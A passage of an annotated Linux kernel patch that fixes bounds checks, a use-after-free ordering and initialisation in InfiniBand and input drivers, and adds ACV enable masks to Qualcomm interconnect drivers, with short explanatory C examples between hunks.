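{
        printf("%d\n", check_sl(5, 4));  /* -1: only SLs 0..3 are valid */
        printf("%d\n", check_sl(2, 4));  /*  0: accepted */
        return 0;
}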
+diff --git a/drivers/infiniband/hw/hns/hns_roce_hw_v2.c b/drivers/infiniband/hw/hns/hns_roce_hw_v2.c
+index 33980485ef5ba..8a9d28f81149a 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_hw_v2.c
++++ b/drivers/infiniband/hw/hns/hns_roce_hw_v2.c
+@@ -270,7 +270,7 @@ static bool check_inl_data_len(struct hns_roce_qp *qp, unsigned int len)
+ 	struct hns_roce_dev *hr_dev = to_hr_dev(qp->ibqp.device);
+ 	int mtu = ib_mtu_enum_to_int(qp->path_mtu);
+ 
+-	if (len > qp->max_inline_data || len > mtu) {
++	if (mtu < 0 || len > qp->max_inline_data || len > mtu) {
+ 		ibdev_err(&hr_dev->ib_dev,
+ 			  "invalid length of data, data len = %u, max inline len = %u, path mtu = %d.\n",
+ 			  len, qp->max_inline_data, mtu);
+@@ -4883,6 +4883,9 @@ static int check_cong_type(struct ib_qp *ibqp,
+ {
+ 	struct hns_roce_dev *hr_dev = to_hr_dev(ibqp->device);
+ 
++	if (ibqp->qp_type == IB_QPT_UD)
++		hr_dev->caps.cong_type = CONG_TYPE_DCQCN;
++
+ 	/* different congestion types match different configurations */
+ 	switch (hr_dev->caps.cong_type) {
+ 	case CONG_TYPE_DCQCN:
+@@ -4979,22 +4982,32 @@ static int hns_roce_v2_set_path(struct ib_qp *ibqp,
+ 	struct hns_roce_qp *hr_qp = to_hr_qp(ibqp);
+ 	struct ib_device *ibdev = &hr_dev->ib_dev;
+ 	const struct ib_gid_attr *gid_attr = NULL;
++	u8 sl = rdma_ah_get_sl(&attr->ah_attr);
+ 	int is_roce_protocol;
+ 	u16 vlan_id = 0xffff;
+ 	bool is_udp = false;
++	u32 max_sl;
+ 	u8 ib_port;
+ 	u8 hr_port;
+ 	int ret;
+ 
++	max_sl = min_t(u32, MAX_SERVICE_LEVEL, hr_dev->caps.sl_num - 1);
++	if (unlikely(sl > max_sl)) {
++		ibdev_err_ratelimited(ibdev,
++				      "failed to fill QPC, sl (%u) shouldn't be larger than %u.\n",
++				      sl, max_sl);
++		return -EINVAL;
++	}
++
+ 	/*
+ 	 * If free_mr_en of qp is set, it means that this qp comes from
+ 	 * free mr. This qp will perform the loopback operation.
+ 	 * In the loopback scenario, only sl needs to be set.
+ 	 */
+ 	if (hr_qp->free_mr_en) {
+-		hr_reg_write(context, QPC_SL, rdma_ah_get_sl(&attr->ah_attr));
++		hr_reg_write(context, QPC_SL, sl);
+ 		hr_reg_clear(qpc_mask, QPC_SL);
+-		hr_qp->sl = rdma_ah_get_sl(&attr->ah_attr);
++		hr_qp->sl = sl;
+ 		return 0;
+ 	}
+ 
+@@ -5061,14 +5074,7 @@ static int hns_roce_v2_set_path(struct ib_qp *ibqp,
+ 	memcpy(context->dgid, grh->dgid.raw, sizeof(grh->dgid.raw));
+ 	memset(qpc_mask->dgid, 0, sizeof(grh->dgid.raw));
+ 
+-	hr_qp->sl = rdma_ah_get_sl(&attr->ah_attr);
+-	if (unlikely(hr_qp->sl > MAX_SERVICE_LEVEL)) {
+-		ibdev_err(ibdev,
+-			  "failed to fill QPC, sl (%u) shouldn't be larger than %d.\n",
+-			  hr_qp->sl, MAX_SERVICE_LEVEL);
+-		return -EINVAL;
+-	}
+-
++	hr_qp->sl = sl;
+ 	hr_reg_write(context, QPC_SL, hr_qp->sl);
+ 	hr_reg_clear(qpc_mask, QPC_SL);
+ 
+@@ -5961,7 +5967,7 @@ static void hns_roce_irq_work_handle(struct work_struct *work)
+ 	case HNS_ROCE_EVENT_TYPE_COMM_EST:
+ 		break;
+ 	case HNS_ROCE_EVENT_TYPE_SQ_DRAINED:
+-		ibdev_warn(ibdev, "send queue drained.\n");
++		ibdev_dbg(ibdev, "send queue drained.\n");
+ 		break;
+ 	case HNS_ROCE_EVENT_TYPE_WQ_CATAS_ERROR:
+ 		ibdev_err(ibdev, "local work queue 0x%x catast error, sub_event type is: %d\n",
+@@ -5976,10 +5982,10 @@ static void hns_roce_irq_work_handle(struct work_struct *work)
+ 			  irq_work->queue_num, irq_work->sub_type);
+ 		break;
+ 	case HNS_ROCE_EVENT_TYPE_SRQ_LIMIT_REACH:
+-		ibdev_warn(ibdev, "SRQ limit reach.\n");
++		ibdev_dbg(ibdev, "SRQ limit reach.\n");
+ 		break;
+ 	case HNS_ROCE_EVENT_TYPE_SRQ_LAST_WQE_REACH:
+-		ibdev_warn(ibdev, "SRQ last wqe reach.\n");
++		ibdev_dbg(ibdev, "SRQ last wqe reach.\n");
+ 		break;
+ 	case HNS_ROCE_EVENT_TYPE_SRQ_CATAS_ERROR:
+ 		ibdev_err(ibdev, "SRQ catas error.\n");
+diff --git a/drivers/infiniband/hw/hns/hns_roce_qp.c b/drivers/infiniband/hw/hns/hns_roce_qp.c
+index 7a95f8677a02c..7b79e6b3f3baa 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_qp.c
++++ b/drivers/infiniband/hw/hns/hns_roce_qp.c
+@@ -1128,7 +1128,7 @@ static int hns_roce_create_qp_common(struct hns_roce_dev *hr_dev,
+ {
+ 	struct hns_roce_ib_create_qp_resp resp = {};
+ 	struct ib_device *ibdev = &hr_dev->ib_dev;
+-	struct hns_roce_ib_create_qp ucmd;
++	struct hns_roce_ib_create_qp ucmd = {};
+ 	int ret;
+ 
+ 	mutex_init(&hr_qp->mutex);
+diff --git a/drivers/infiniband/hw/mlx5/main.c b/drivers/infiniband/hw/mlx5/main.c
+index 0baf3b5518b46..bce31e28eb303 100644
+--- a/drivers/infiniband/hw/mlx5/main.c
++++ b/drivers/infiniband/hw/mlx5/main.c
+@@ -4027,10 +4027,8 @@ static int mlx5_ib_stage_post_ib_reg_umr_init(struct mlx5_ib_dev *dev)
+ 		return ret;
+ 
+ 	ret = mlx5_mkey_cache_init(dev);
+-	if (ret) {
++	if (ret)
+ 		mlx5_ib_warn(dev, "mr cache init failed %d\n", ret);
+-		mlx5r_umr_resource_cleanup(dev);
+-	}
+ 	return ret;
+ }
+ 
+diff --git a/drivers/infiniband/hw/mlx5/qp.c b/drivers/infiniband/hw/mlx5/qp.c
+index ac53ed79ca64c..e0df3017e241a 100644
+--- a/drivers/infiniband/hw/mlx5/qp.c
++++ b/drivers/infiniband/hw/mlx5/qp.c
+@@ -3960,6 +3960,30 @@ static unsigned int get_tx_affinity(struct ib_qp *qp,
+ 	return tx_affinity;
+ }
+ 
++static int __mlx5_ib_qp_set_raw_qp_counter(struct mlx5_ib_qp *qp, u32 set_id,
++					   struct mlx5_core_dev *mdev)
++{
++	struct mlx5_ib_raw_packet_qp *raw_packet_qp = &qp->raw_packet_qp;
++	struct mlx5_ib_rq *rq = &raw_packet_qp->rq;
++	u32 in[MLX5_ST_SZ_DW(modify_rq_in)] = {};
++	void *rqc;
++
++	if (!qp->rq.wqe_cnt)
++		return 0;
++
++	MLX5_SET(modify_rq_in, in, rq_state, rq->state);
++	MLX5_SET(modify_rq_in, in, uid, to_mpd(qp->ibqp.pd)->uid);
++
++	rqc = MLX5_ADDR_OF(modify_rq_in, in, ctx);
++	MLX5_SET(rqc, rqc, state, MLX5_RQC_STATE_RDY);
++
++	MLX5_SET64(modify_rq_in, in, modify_bitmask,
++		   MLX5_MODIFY_RQ_IN_MODIFY_BITMASK_RQ_COUNTER_SET_ID);
++	MLX5_SET(rqc, rqc, counter_set_id, set_id);
++
++	return mlx5_core_modify_rq(mdev, rq->base.mqp.qpn, in);
++}
++
+ static int __mlx5_ib_qp_set_counter(struct ib_qp *qp,
+ 				    struct rdma_counter *counter)
+ {
+@@ -3975,6 +3999,9 @@ static int __mlx5_ib_qp_set_counter(struct ib_qp *qp,
+ 	else
+ 		set_id = mlx5_ib_get_counters_id(dev, mqp->port - 1);
+ 
++	if (mqp->type == IB_QPT_RAW_PACKET)
++		return __mlx5_ib_qp_set_raw_qp_counter(mqp, set_id, dev->mdev);
++
+ 	base = &mqp->trans_qp.base;
+ 	MLX5_SET(rts2rts_qp_in, in, opcode, MLX5_CMD_OP_RTS2RTS_QP);
+ 	MLX5_SET(rts2rts_qp_in, in, qpn, base->mqp.qpn);
+diff --git a/drivers/input/rmi4/rmi_bus.c b/drivers/input/rmi4/rmi_bus.c
+index 50a0134b6901b..e6557d5f50ce5 100644
+--- a/drivers/input/rmi4/rmi_bus.c
++++ b/drivers/input/rmi4/rmi_bus.c
+@@ -277,11 +277,11 @@ void rmi_unregister_function(struct rmi_function *fn)
+ 
+ 	device_del(&fn->dev);
+ 	of_node_put(fn->dev.of_node);
+-	put_device(&fn->dev);
+ 
+ 	for (i = 0; i < fn->num_of_irqs; i++)
+ 		irq_dispose_mapping(fn->irq[i]);
+ 
++	put_device(&fn->dev);
+ }
+ 
+ /**
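The rmi_bus fix above is purely an ordering change: put_device() may drop the last reference and free fn, so it must come after the loop that still dereferences fn->num_of_irqs and fn->irq[]. The use-after-free pattern in miniature, with a toy refcount instead of struct device:

#include <stdio.h>
#include <stdlib.h>

struct obj {
        int refs;
        int num_of_irqs;
};

static void put_obj(struct obj *o)
{
        if (--o->refs == 0)
                free(o);
}

static void teardown(struct obj *o)
{
        int i;

        /* the reference is still held, so reading o here is safe */
        for (i = 0; i < o->num_of_irqs; i++)
                ;       /* dispose per-IRQ state */

        put_obj(o);     /* drop the reference only after the last use */
}

int main(void)
{
        struct obj *o = malloc(sizeof(*o));

        if (!o)
                return 1;
        o->refs = 1;
        o->num_of_irqs = 3;
        teardown(o);
        puts("ok");
        return 0;
}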
+diff --git a/drivers/interconnect/core.c b/drivers/interconnect/core.c
+index e4b2d9ef61b4d..0c6fc954e7296 100644
+--- a/drivers/interconnect/core.c
++++ b/drivers/interconnect/core.c
+@@ -1100,15 +1100,17 @@ void icc_provider_del(struct icc_provider *provider)
+ }
+ EXPORT_SYMBOL_GPL(icc_provider_del);
+ 
++static const struct of_device_id __maybe_unused ignore_list[] = {
++	{ .compatible = "qcom,sc7180-ipa-virt" },
++	{ .compatible = "qcom,sdx55-ipa-virt" },
++	{ .compatible = "qcom,sm8150-ipa-virt" },
++	{}
++};
++
+ static int of_count_icc_providers(struct device_node *np)
+ {
+ 	struct device_node *child;
+ 	int count = 0;
+-	const struct of_device_id __maybe_unused ignore_list[] = {
+-		{ .compatible = "qcom,sc7180-ipa-virt" },
+-		{ .compatible = "qcom,sdx55-ipa-virt" },
+-		{}
+-	};
+ 
+ 	for_each_available_child_of_node(np, child) {
+ 		if (of_property_read_bool(child, "#interconnect-cells") &&
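The interconnect core hunk above hoists the ignore table to file scope and adds the retired qcom,sm8150-ipa-virt compatible, so provider counting skips device-tree nodes whose drivers no longer exist. The counting idea modelled in plain C, with hypothetical child-node names:

#include <stdio.h>
#include <string.h>

static const char * const ignore_list[] = {
        "qcom,sc7180-ipa-virt",
        "qcom,sdx55-ipa-virt",
        "qcom,sm8150-ipa-virt",
        NULL,
};

static int is_ignored(const char *compatible)
{
        int i;

        for (i = 0; ignore_list[i]; i++)
                if (!strcmp(ignore_list[i], compatible))
                        return 1;
        return 0;
}

int main(void)
{
        const char *children[] = { "qcom,sm8150-ipa-virt",
                                   "qcom,sm8150-mc-virt" };
        int i, count = 0;

        for (i = 0; i < 2; i++)
                if (!is_ignored(children[i]))
                        count++;

        printf("providers counted: %d\n", count);       /* prints 1 */
        return 0;
}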
+diff --git a/drivers/interconnect/qcom/sc7180.c b/drivers/interconnect/qcom/sc7180.c
+index 82d5e8a8c19ea..6d0450351a5a7 100644
+--- a/drivers/interconnect/qcom/sc7180.c
++++ b/drivers/interconnect/qcom/sc7180.c
+@@ -153,30 +153,238 @@ DEFINE_QNODE(srvc_snoc, SC7180_SLAVE_SERVICE_SNOC, 1, 4);
+ DEFINE_QNODE(xs_qdss_stm, SC7180_SLAVE_QDSS_STM, 1, 4);
+ DEFINE_QNODE(xs_sys_tcu_cfg, SC7180_SLAVE_TCU, 1, 8);
+ 
+-DEFINE_QBCM(bcm_acv, "ACV", false, &ebi);
+-DEFINE_QBCM(bcm_mc0, "MC0", true, &ebi);
+-DEFINE_QBCM(bcm_sh0, "SH0", true, &qns_llcc);
+-DEFINE_QBCM(bcm_mm0, "MM0", false, &qns_mem_noc_hf);
+-DEFINE_QBCM(bcm_ce0, "CE0", false, &qxm_crypto);
+-DEFINE_QBCM(bcm_cn0, "CN0", true, &qnm_snoc, &xm_qdss_dap, &qhs_a1_noc_cfg, &qhs_a2_noc_cfg, &qhs_ahb2phy0, &qhs_aop, &qhs_aoss, &qhs_boot_rom, &qhs_camera_cfg, &qhs_camera_nrt_throttle_cfg, &qhs_camera_rt_throttle_cfg, &qhs_clk_ctl, &qhs_cpr_cx, &qhs_cpr_mx, &qhs_crypto0_cfg, &qhs_dcc_cfg, &qhs_ddrss_cfg, &qhs_display_cfg, &qhs_display_rt_throttle_cfg, &qhs_display_throttle_cfg, &qhs_glm, &qhs_gpuss_cfg, &qhs_imem_cfg, &qhs_ipa, &qhs_mnoc_cfg, &qhs_mss_cfg, &qhs_npu_cfg, &qhs_npu_dma_throttle_cfg, &qhs_npu_dsp_throttle_cfg, &qhs_pimem_cfg, &qhs_prng, &qhs_qdss_cfg, &qhs_qm_cfg, &qhs_qm_mpu_cfg, &qhs_qup0, &qhs_qup1, &qhs_security, &qhs_snoc_cfg, &qhs_tcsr, &qhs_tlmm_1, &qhs_tlmm_2, &qhs_tlmm_3, &qhs_ufs_mem_cfg, &qhs_usb3, &qhs_venus_cfg, &qhs_venus_throttle_cfg, &qhs_vsense_ctrl_cfg, &srvc_cnoc);
+-DEFINE_QBCM(bcm_mm1, "MM1", false, &qxm_camnoc_hf0_uncomp, &qxm_camnoc_hf1_uncomp, &qxm_camnoc_sf_uncomp, &qhm_mnoc_cfg, &qxm_mdp0, &qxm_rot, &qxm_venus0, &qxm_venus_arm9);
+-DEFINE_QBCM(bcm_sh2, "SH2", false, &acm_sys_tcu);
+-DEFINE_QBCM(bcm_mm2, "MM2", false, &qns_mem_noc_sf);
+-DEFINE_QBCM(bcm_qup0, "QUP0", false, &qup_core_master_1, &qup_core_master_2);
+-DEFINE_QBCM(bcm_sh3, "SH3", false, &qnm_cmpnoc);
+-DEFINE_QBCM(bcm_sh4, "SH4", false, &acm_apps0);
+-DEFINE_QBCM(bcm_sn0, "SN0", true, &qns_gemnoc_sf);
+-DEFINE_QBCM(bcm_co0, "CO0", false, &qns_cdsp_gemnoc);
+-DEFINE_QBCM(bcm_sn1, "SN1", false, &qxs_imem);
+-DEFINE_QBCM(bcm_cn1, "CN1", false, &qhm_qspi, &xm_sdc2, &xm_emmc, &qhs_ahb2phy2, &qhs_emmc_cfg, &qhs_pdm, &qhs_qspi, &qhs_sdc2);
+-DEFINE_QBCM(bcm_sn2, "SN2", false, &qxm_pimem, &qns_gemnoc_gc);
+-DEFINE_QBCM(bcm_co2, "CO2", false, &qnm_npu);
+-DEFINE_QBCM(bcm_sn3, "SN3", false, &qxs_pimem);
+-DEFINE_QBCM(bcm_co3, "CO3", false, &qxm_npu_dsp);
+-DEFINE_QBCM(bcm_sn4, "SN4", false, &xs_qdss_stm);
+-DEFINE_QBCM(bcm_sn7, "SN7", false, &qnm_aggre1_noc);
+-DEFINE_QBCM(bcm_sn9, "SN9", false, &qnm_aggre2_noc);
+-DEFINE_QBCM(bcm_sn12, "SN12", false, &qnm_gemnoc);
++static struct qcom_icc_bcm bcm_acv = {
++	.name = "ACV",
++	.enable_mask = BIT(3),
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &ebi },
++};
++
++static struct qcom_icc_bcm bcm_mc0 = {
++	.name = "MC0",
++	.keepalive = true,
++	.num_nodes = 1,
++	.nodes = { &ebi },
++};
++
++static struct qcom_icc_bcm bcm_sh0 = {
++	.name = "SH0",
++	.keepalive = true,
++	.num_nodes = 1,
++	.nodes = { &qns_llcc },
++};
++
++static struct qcom_icc_bcm bcm_mm0 = {
++	.name = "MM0",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qns_mem_noc_hf },
++};
++
++static struct qcom_icc_bcm bcm_ce0 = {
++	.name = "CE0",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qxm_crypto },
++};
++
++static struct qcom_icc_bcm bcm_cn0 = {
++	.name = "CN0",
++	.keepalive = true,
++	.num_nodes = 48,
++	.nodes = { &qnm_snoc,
++		   &xm_qdss_dap,
++		   &qhs_a1_noc_cfg,
++		   &qhs_a2_noc_cfg,
++		   &qhs_ahb2phy0,
++		   &qhs_aop,
++		   &qhs_aoss,
++		   &qhs_boot_rom,
++		   &qhs_camera_cfg,
++		   &qhs_camera_nrt_throttle_cfg,
++		   &qhs_camera_rt_throttle_cfg,
++		   &qhs_clk_ctl,
++		   &qhs_cpr_cx,
++		   &qhs_cpr_mx,
++		   &qhs_crypto0_cfg,
++		   &qhs_dcc_cfg,
++		   &qhs_ddrss_cfg,
++		   &qhs_display_cfg,
++		   &qhs_display_rt_throttle_cfg,
++		   &qhs_display_throttle_cfg,
++		   &qhs_glm,
++		   &qhs_gpuss_cfg,
++		   &qhs_imem_cfg,
++		   &qhs_ipa,
++		   &qhs_mnoc_cfg,
++		   &qhs_mss_cfg,
++		   &qhs_npu_cfg,
++		   &qhs_npu_dma_throttle_cfg,
++		   &qhs_npu_dsp_throttle_cfg,
++		   &qhs_pimem_cfg,
++		   &qhs_prng,
++		   &qhs_qdss_cfg,
++		   &qhs_qm_cfg,
++		   &qhs_qm_mpu_cfg,
++		   &qhs_qup0,
++		   &qhs_qup1,
++		   &qhs_security,
++		   &qhs_snoc_cfg,
++		   &qhs_tcsr,
++		   &qhs_tlmm_1,
++		   &qhs_tlmm_2,
++		   &qhs_tlmm_3,
++		   &qhs_ufs_mem_cfg,
++		   &qhs_usb3,
++		   &qhs_venus_cfg,
++		   &qhs_venus_throttle_cfg,
++		   &qhs_vsense_ctrl_cfg,
++		   &srvc_cnoc
++	},
++};
++
++static struct qcom_icc_bcm bcm_mm1 = {
++	.name = "MM1",
++	.keepalive = false,
++	.num_nodes = 8,
++	.nodes = { &qxm_camnoc_hf0_uncomp,
++		   &qxm_camnoc_hf1_uncomp,
++		   &qxm_camnoc_sf_uncomp,
++		   &qhm_mnoc_cfg,
++		   &qxm_mdp0,
++		   &qxm_rot,
++		   &qxm_venus0,
++		   &qxm_venus_arm9
++	},
++};
++
++static struct qcom_icc_bcm bcm_sh2 = {
++	.name = "SH2",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &acm_sys_tcu },
++};
++
++static struct qcom_icc_bcm bcm_mm2 = {
++	.name = "MM2",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qns_mem_noc_sf },
++};
++
++static struct qcom_icc_bcm bcm_qup0 = {
++	.name = "QUP0",
++	.keepalive = false,
++	.num_nodes = 2,
++	.nodes = { &qup_core_master_1, &qup_core_master_2 },
++};
++
++static struct qcom_icc_bcm bcm_sh3 = {
++	.name = "SH3",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qnm_cmpnoc },
++};
++
++static struct qcom_icc_bcm bcm_sh4 = {
++	.name = "SH4",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &acm_apps0 },
++};
++
++static struct qcom_icc_bcm bcm_sn0 = {
++	.name = "SN0",
++	.keepalive = true,
++	.num_nodes = 1,
++	.nodes = { &qns_gemnoc_sf },
++};
++
++static struct qcom_icc_bcm bcm_co0 = {
++	.name = "CO0",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qns_cdsp_gemnoc },
++};
++
++static struct qcom_icc_bcm bcm_sn1 = {
++	.name = "SN1",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qxs_imem },
++};
++
++static struct qcom_icc_bcm bcm_cn1 = {
++	.name = "CN1",
++	.keepalive = false,
++	.num_nodes = 8,
++	.nodes = { &qhm_qspi,
++		   &xm_sdc2,
++		   &xm_emmc,
++		   &qhs_ahb2phy2,
++		   &qhs_emmc_cfg,
++		   &qhs_pdm,
++		   &qhs_qspi,
++		   &qhs_sdc2
++	},
++};
++
++static struct qcom_icc_bcm bcm_sn2 = {
++	.name = "SN2",
++	.keepalive = false,
++	.num_nodes = 2,
++	.nodes = { &qxm_pimem, &qns_gemnoc_gc },
++};
++
++static struct qcom_icc_bcm bcm_co2 = {
++	.name = "CO2",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qnm_npu },
++};
++
++static struct qcom_icc_bcm bcm_sn3 = {
++	.name = "SN3",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qxs_pimem },
++};
++
++static struct qcom_icc_bcm bcm_co3 = {
++	.name = "CO3",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qxm_npu_dsp },
++};
++
++static struct qcom_icc_bcm bcm_sn4 = {
++	.name = "SN4",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &xs_qdss_stm },
++};
++
++static struct qcom_icc_bcm bcm_sn7 = {
++	.name = "SN7",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qnm_aggre1_noc },
++};
++
++static struct qcom_icc_bcm bcm_sn9 = {
++	.name = "SN9",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qnm_aggre2_noc },
++};
++
++static struct qcom_icc_bcm bcm_sn12 = {
++	.name = "SN12",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qnm_gemnoc },
++};
+ 
+ static struct qcom_icc_bcm * const aggre1_noc_bcms[] = {
+ 	&bcm_cn1,
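The sc7180 rewrite above, like the sdm845, sm6350, sm8150 and sm8350 hunks below, expands every DEFINE_QBCM() use into an explicit designated initializer because the macro has no parameter for the enable_mask field that ACV now needs. A compilable miniature of the before and after, with the struct and macro simplified (not the real qcom_icc_bcm):

#include <stdio.h>

#define BIT(n) (1U << (n))

struct bcm {                    /* simplified stand-in for qcom_icc_bcm */
        const char *name;
        unsigned int enable_mask;
        int keepalive;
};

/* old-style helper macro: no way to pass enable_mask */
#define DEFINE_QBCM(sym, n, keep) \
        static struct bcm sym = { .name = n, .keepalive = keep }

DEFINE_QBCM(bcm_old, "MC0", 1);         /* enable_mask stuck at 0 */

static struct bcm bcm_new = {           /* expanded form */
        .name = "ACV",
        .enable_mask = BIT(3),          /* now expressible */
        .keepalive = 0,
};

int main(void)
{
        printf("%s mask=%#x\n", bcm_old.name, bcm_old.enable_mask);
        printf("%s mask=%#x\n", bcm_new.name, bcm_new.enable_mask);
        return 0;
}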
+diff --git a/drivers/interconnect/qcom/sc7280.c b/drivers/interconnect/qcom/sc7280.c
+index 971f538bc98ad..3c39edd21b6ca 100644
+--- a/drivers/interconnect/qcom/sc7280.c
++++ b/drivers/interconnect/qcom/sc7280.c
+@@ -1284,6 +1284,7 @@ static struct qcom_icc_node srvc_snoc = {
+ 
+ static struct qcom_icc_bcm bcm_acv = {
+ 	.name = "ACV",
++	.enable_mask = BIT(3),
+ 	.num_nodes = 1,
+ 	.nodes = { &ebi },
+ };
+diff --git a/drivers/interconnect/qcom/sc8180x.c b/drivers/interconnect/qcom/sc8180x.c
+index 8e32ca958824c..83461e31774ec 100644
+--- a/drivers/interconnect/qcom/sc8180x.c
++++ b/drivers/interconnect/qcom/sc8180x.c
+@@ -1360,6 +1360,7 @@ static struct qcom_icc_node slv_qup_core_2 = {
+ 
+ static struct qcom_icc_bcm bcm_acv = {
+ 	.name = "ACV",
++	.enable_mask = BIT(3),
+ 	.num_nodes = 1,
+ 	.nodes = { &slv_ebi }
+ };
+diff --git a/drivers/interconnect/qcom/sc8280xp.c b/drivers/interconnect/qcom/sc8280xp.c
+index 507fe5f89791a..489f259a02e5b 100644
+--- a/drivers/interconnect/qcom/sc8280xp.c
++++ b/drivers/interconnect/qcom/sc8280xp.c
+@@ -1727,6 +1727,7 @@ static struct qcom_icc_node srvc_snoc = {
+ 
+ static struct qcom_icc_bcm bcm_acv = {
+ 	.name = "ACV",
++	.enable_mask = BIT(3),
+ 	.num_nodes = 1,
+ 	.nodes = { &ebi },
+ };
+diff --git a/drivers/interconnect/qcom/sdm845.c b/drivers/interconnect/qcom/sdm845.c
+index 954e7bd13fc41..02cf890684441 100644
+--- a/drivers/interconnect/qcom/sdm845.c
++++ b/drivers/interconnect/qcom/sdm845.c
+@@ -146,34 +146,256 @@ DEFINE_QNODE(srvc_snoc, SDM845_SLAVE_SERVICE_SNOC, 1, 4);
+ DEFINE_QNODE(xs_qdss_stm, SDM845_SLAVE_QDSS_STM, 1, 4);
+ DEFINE_QNODE(xs_sys_tcu_cfg, SDM845_SLAVE_TCU, 1, 8);
+ 
+-DEFINE_QBCM(bcm_acv, "ACV", false, &ebi);
+-DEFINE_QBCM(bcm_mc0, "MC0", true, &ebi);
+-DEFINE_QBCM(bcm_sh0, "SH0", true, &qns_llcc);
+-DEFINE_QBCM(bcm_mm0, "MM0", false, &qns_mem_noc_hf);
+-DEFINE_QBCM(bcm_sh1, "SH1", false, &qns_apps_io);
+-DEFINE_QBCM(bcm_mm1, "MM1", true, &qxm_camnoc_hf0_uncomp, &qxm_camnoc_hf1_uncomp, &qxm_camnoc_sf_uncomp, &qxm_camnoc_hf0, &qxm_camnoc_hf1, &qxm_mdp0, &qxm_mdp1);
+-DEFINE_QBCM(bcm_sh2, "SH2", false, &qns_memnoc_snoc);
+-DEFINE_QBCM(bcm_mm2, "MM2", false, &qns2_mem_noc);
+-DEFINE_QBCM(bcm_sh3, "SH3", false, &acm_tcu);
+-DEFINE_QBCM(bcm_mm3, "MM3", false, &qxm_camnoc_sf, &qxm_rot, &qxm_venus0, &qxm_venus1, &qxm_venus_arm9);
+-DEFINE_QBCM(bcm_sh5, "SH5", false, &qnm_apps);
+-DEFINE_QBCM(bcm_sn0, "SN0", true, &qns_memnoc_sf);
+-DEFINE_QBCM(bcm_ce0, "CE0", false, &qxm_crypto);
+-DEFINE_QBCM(bcm_cn0, "CN0", false, &qhm_spdm, &qhm_tic, &qnm_snoc, &xm_qdss_dap, &qhs_a1_noc_cfg, &qhs_a2_noc_cfg, &qhs_aop, &qhs_aoss, &qhs_camera_cfg, &qhs_clk_ctl, &qhs_compute_dsp_cfg, &qhs_cpr_cx, &qhs_crypto0_cfg, &qhs_dcc_cfg, &qhs_ddrss_cfg, &qhs_display_cfg, &qhs_glm, &qhs_gpuss_cfg, &qhs_imem_cfg, &qhs_ipa, &qhs_mnoc_cfg, &qhs_pcie0_cfg, &qhs_pcie_gen3_cfg, &qhs_pdm, &qhs_phy_refgen_south, &qhs_pimem_cfg, &qhs_prng, &qhs_qdss_cfg, &qhs_qupv3_north, &qhs_qupv3_south, &qhs_sdc2, &qhs_sdc4, &qhs_snoc_cfg, &qhs_spdm, &qhs_spss_cfg, &qhs_tcsr, &qhs_tlmm_north, &qhs_tlmm_south, &qhs_tsif, &qhs_ufs_card_cfg, &qhs_ufs_mem_cfg, &qhs_usb3_0, &qhs_usb3_1, &qhs_venus_cfg, &qhs_vsense_ctrl_cfg, &qns_cnoc_a2noc, &srvc_cnoc);
+-DEFINE_QBCM(bcm_qup0, "QUP0", false, &qhm_qup1, &qhm_qup2);
+-DEFINE_QBCM(bcm_sn1, "SN1", false, &qxs_imem);
+-DEFINE_QBCM(bcm_sn2, "SN2", false, &qns_memnoc_gc);
+-DEFINE_QBCM(bcm_sn3, "SN3", false, &qns_cnoc);
+-DEFINE_QBCM(bcm_sn4, "SN4", false, &qxm_pimem);
+-DEFINE_QBCM(bcm_sn5, "SN5", false, &xs_qdss_stm);
+-DEFINE_QBCM(bcm_sn6, "SN6", false, &qhs_apss, &srvc_snoc, &xs_sys_tcu_cfg);
+-DEFINE_QBCM(bcm_sn7, "SN7", false, &qxs_pcie);
+-DEFINE_QBCM(bcm_sn8, "SN8", false, &qxs_pcie_gen3);
+-DEFINE_QBCM(bcm_sn9, "SN9", false, &srvc_aggre1_noc, &qnm_aggre1_noc);
+-DEFINE_QBCM(bcm_sn11, "SN11", false, &srvc_aggre2_noc, &qnm_aggre2_noc);
+-DEFINE_QBCM(bcm_sn12, "SN12", false, &qnm_gladiator_sodv, &xm_gic);
+-DEFINE_QBCM(bcm_sn14, "SN14", false, &qnm_pcie_anoc);
+-DEFINE_QBCM(bcm_sn15, "SN15", false, &qnm_memnoc);
++static struct qcom_icc_bcm bcm_acv = {
++	.name = "ACV",
++	.enable_mask = BIT(3),
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &ebi },
++};
++
++static struct qcom_icc_bcm bcm_mc0 = {
++	.name = "MC0",
++	.keepalive = true,
++	.num_nodes = 1,
++	.nodes = { &ebi },
++};
++
++static struct qcom_icc_bcm bcm_sh0 = {
++	.name = "SH0",
++	.keepalive = true,
++	.num_nodes = 1,
++	.nodes = { &qns_llcc },
++};
++
++static struct qcom_icc_bcm bcm_mm0 = {
++	.name = "MM0",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qns_mem_noc_hf },
++};
++
++static struct qcom_icc_bcm bcm_sh1 = {
++	.name = "SH1",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qns_apps_io },
++};
++
++static struct qcom_icc_bcm bcm_mm1 = {
++	.name = "MM1",
++	.keepalive = true,
++	.num_nodes = 7,
++	.nodes = { &qxm_camnoc_hf0_uncomp,
++		   &qxm_camnoc_hf1_uncomp,
++		   &qxm_camnoc_sf_uncomp,
++		   &qxm_camnoc_hf0,
++		   &qxm_camnoc_hf1,
++		   &qxm_mdp0,
++		   &qxm_mdp1
++	},
++};
++
++static struct qcom_icc_bcm bcm_sh2 = {
++	.name = "SH2",
++	.keepalive = false,
